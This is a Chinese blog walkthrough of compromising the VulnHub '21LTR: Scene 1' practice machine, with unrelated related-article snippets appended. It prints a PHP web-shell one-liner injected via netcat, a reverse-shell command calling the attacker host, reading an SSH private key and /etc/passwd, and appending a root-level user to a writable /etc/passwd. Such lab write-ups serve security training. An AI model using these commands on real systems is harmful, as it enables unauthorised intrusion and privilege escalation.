Hack the 21LTR: Scene 1 靶机

已于 2024-07-30 21:40:31 修改
阅读量375 收藏 10
点赞数 4
文章标签: 笔记
于 2024-07-30 20:56:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hqy250019/article/details/140806574
版权

扫描IP地址

我们的目标是 192.168.2.120 现在使用 nmap 扫描目标:

nmap 192.168.2.120

可以看到 HTTP 服务在 3个端口上运行,即端口21, 22,80

访问192.168.2.120

发现扫描都没有,右键查看源代码,获得了一些登录凭据。

发现一组账号密码logs zg]E-b0]+8:(58G

尝试ssh连接,发现连接失败

再尝试ftp连接,发现连接成功

ls,发现一个backup_log.php文件

将文件下载到我们的本地系统后,我们使用 cat 命令在kali中打开该文件

get backup_log.php
cat backup_log.php

在网站路径上拼接/logs/,发现访问被拒绝

试着在其后面拼接/backup_log.php看是否有信息

在端口 10001 上启动了一个 netcat 会话,我们得到了一个空白的 shell

nc -nv 192.168.2.120 10001
<?php system($_GET['cmd']) ?>

拼接?cmd=id,尝试运行 id命令,发现得到回复。这证明我们可以从这里运行命令。

反弹shell

设置监听

nc -e /bin/sh 192.168.2.128 5555

反弹成功

建立交互式的shell:

python -c 'import pty; pty.spawn("/bin/sh")'

提权

cd /media/USB_1/Stuff/Keys
ls
cat authorized_keys    #发现是hbeale用户

查看密钥文件

cat id_rsa

查看/etc/passwd文件验证,发现确实存在hbeale用户:

cat /etc/passwd

尝试用密钥文件登录:

ssh -i id_rsa hbeale@192.168.2.120

登陆成功

但是是低权限用户

利用不安全配置/etc/passwd可写进行提权:

创建root权限的新用户和密码,将自动生成的hash值加入/etc/passwd

echo 'newuser:$1$dY7ecSy3$DuiqIJfj/66qr4GMayq1O/:0:0:root:/root:/bin/bash' >> /etc/passwd

su切换newuser用户

提权成功

陽陽yy
关注
  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF之21LTR Scene1 靶机渗透(日志信息,Wireshark抓包)
afei001
08-02 720
  练习环境     攻击机:kali     靶机21LTR: Scene1     下载地址:https://download.vulnhub.com/21ltrcom/21LTR.com_Scene1_2.120_v1.0.iso      1.发现靶机,端口扫描 root@kali:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.2.3 .
21LTR: Scene 1靶机
m0_61995767的博客
07-30 571
21LTR: Scene 1打靶记录
Hack the 21LTR: Scene 1 VM (Boot to Root)
marcushbs的博客
08-21 405
靶机下载链接: https://www.vulnhub.com/entry/21ltr-scene-1,3/ 主机扫描: ╰─ nmap -p1-65535 -sV -sC -A 192.168.2.120 Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-28 11:19 CSTNmap scan report for 192.168.2.120Host is up (0.0012s latency).Not shown: 65532 ...
Vulnhub靶机渗透之21LTRvunlhub
2301_77039831的博客
10-17 270
到这里有两种思路,因为可以通过root的cat命令读取文件,所以可以看/etc/shadow,也可以写入该文件。由于是php的日志所以思路是想办法把一句话写入这个页面,看了下其他大佬的WP,得访问10001端口。接下来是方法二,因为可以读取shadow文件,所以试图将root的shadow文件的密码进行破解。连接后看下敏感文件,结合靶机有ssh服务,尝试读取密钥,发现可以读取。先创建一个文件,内容是root的加密密码,然后使用john解密。先nmap扫一下,发现有21,22,80端口。
vulnhub系列:21LTR:Scene1靶机
jq_j37的博客
07-29 375
21LTR:Scene1靶机,打靶文章
21LTR:Scene1超详细靶机实战
weixin_68615160的博客
07-30 414
考虑到是日志文件,我们可以尝试将一句话木马写到日志文件中获取shell。读取密钥 /media/USB_1/Stuff/Keys/id_rsa。尝试用该账号连接ssh服务和ftp服务,成功连接ftp服务。我们想起来刚刚目录探测有一个logs目录,我们尝试访问。将newroot用户写入到/etc/passwd。发现不需要密码的只有cat命令,我们就用它去提权。我们F12查看页面源码可以发现一个用户和密码。考虑到有ssh服务,我们可以使用密钥免密登录。写入一个高权限用户到/etc/passwd。
21LTR-Scene靶机渗透测试
weixin_58786230的博客
07-30 423
【代码】21LTR-Scene靶机渗透测试。
LQG-LTR:精馏塔多变量控制中的LqG/LTR方法-matlab开发
05-30
1. 精馏塔过程的数学模型,通常用状态空间形式表示。 2. Kalman滤波器的实现,用于估计系统的不确定状态。 3. LQG控制器的设计,包括权重矩阵的选择,以优化特定的性能指标。 4. 李雅普诺夫函数的构造和分析,确保...
panel-navigation-rtl-ltr:带有RTL支持的精美面板导航
05-11
标题 "panel-navigation-rtl-ltr:带有RTL支持的精美面板导航" 暗示了这是一个设计用于后台管理界面(admin dashboard)的导航组件,它具备右到左(RTL)和左到右(LTR)的语言布局支持。这在处理多语言网站或者需要...
ltr-tools:一套用于学习排名的命令行工具
05-19
该项目同时包含ltr-tools cli和solr配置,以提供后端搜索功能。 该项目的主要范围将是提供有用的工具,以帮助“学习排名”集成和开发。 ltr-tools是一个命令行界面,用于运行一组实用程序任务,以可视化,调试和...
LtR-Feature-Extractor:学习排名特征提取任务
04-28
《LtR特征提取器:深度探索学习排名与信息检索》 在信息检索(IR)领域,学习排名(Learning-to-Rank, LTR)是一种至关重要的技术,它通过机器学习方法来优化文档排序,以提高搜索结果的相关性。LtR特征提取器就是...
S905X3安卓9.0 安卓11 手柄驱动 调试命令 ampere:/ $ getevent -ltr add device 1
06-14
标题中的"S905X3安卓9.0 安卓11 手柄驱动"指的是基于Amlogic S905X3芯片的设备在运行Android 9.0或Android 11操作系统时的手柄驱动程序。S905X3是一款常见的应用于智能电视盒和流媒体设备的系统级芯片。...
维度不固定的多维数组形参笔记
H2z1220的博客
09-05 179
假如我有多个元素个数都不一致的多维数组都需要调用这个函数进行处理,这个形参问题就凸显出来了,总不能创建N个不同的函数来进行处理吧?这样也太繁琐了,而且也适用度不高。这个函数可以传入多维数组,但元素个数必须是固定的,假如传入一个str[][20],元素个数不一样的数组,那么这个函数就不适用了,且会报错。所有数据在存储空间里面都是有地址的,那么就可利用指针寻址来获取到相应的数据。在查找了一些资料后受到了一点启发。而这里也可利用指针来指向多维数组。
【机器人工具箱Robotics Toolbox开发笔记(十)】机器人微分运动学
最新发布
m0_72676510的博客
09-07 71
机器人工具箱中,可用函数SerialLink.jacob0()求出对应某个位姿下绝对坐标系中的雅可比矩阵,用SerialLink.jacobn()求出对应某个位姿下工具坐标系中的雅可比矩阵。
C++学习笔记(10)
qq_60098634的博客
09-07 389
unordered_multimap 和 unordered_map 的区别在:unordered_multimap 允许关键字重复,而。unordered_multiset 和 unordered_set 的区别在:unordered_multiset 允许关键字重复,而。
java一点笔记
m0_73444474的博客
09-02 319
上述代码第一行输出:a+b=1020。第二行输出:30a+b。说明字符串在前为拼接。
【扇贝编程】使用Selenium模拟浏览器获取动态内容笔记
m0_73676887的博客
09-03 1641
文章目录selenium安装 selenium下载浏览器驱动获取数据处理数据查找一个元素查找所有符合条件的元素控制浏览器 selenium selenium是爬虫的好帮手, 可以控制你的浏览器,模仿人浏览网页,从而获取数据,自动操作等。 我们只要让 selenium 自动控制浏览器,实现爬取数据、自动抢票…… selenium要打开浏览器并控制它,占用的资源会更多,爬取数据的效率也会有所降低。 安装 selenium pip install selenium 下载浏览器驱动 根据你使用的浏览器(如 Chr
【数学分析笔记】第3章第1节 函数极限(2)
随手写写
09-03 425
3. 函数极限与连续函数 3.1 函数极限 lim⁡x→x0f(x)=A:\lim\limits_{x\to x_{0}}f(x)=A:x→x0​lim​f(x)=A:对任意给定的ε>0\varepsilon>0ε>0,可以找到δ>0\delta>0δ>0,当xxx满足0<∣x−x0∣<δ0<|x-x_{0}|<\delta0<∣x−x0​∣<δ成立∣f(x)−A∣<ε|f(x)-A|<\varepsilon∣f(x)−A∣
STM32学习笔记4 --- USART
2301_80397661的博客
09-06 574
2.GPIO初始化,TX复用输出,RX输入(这个程序仅输出可以先只初始化一个pa9 把PA9配置为复用推挽输出,供USART1的TX使用),而CAN虽然也用于串行通信,但其通常不被直接归类为传统的串口通信协议,而是作为一种特定的串行通信协议存在。每个字节的数据加上起始位、停止位、可选的校验位,打包为数据帧,依次输出在TX引脚,另一端RX引脚依次接收。数据包的作用是,把一个个单独的数据给打包起来,方便我们进行多字节的数据通信。4.发送函数,接收函数,获取发送和接收的状态,就调用获取标志位的函数。
ProtDec-LTR:学习排序提升蛋白质远程同源性检测
论文作者Bin Liu、Junjie Chen和Xiaolong Wang提出了一种名为ProtDec-LTR(Protein Decoder with Learning to Rank)的新方法。这种方法结合了学习排名的策略,目的是通过优化现有技术的组合来提高预测的准确性。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值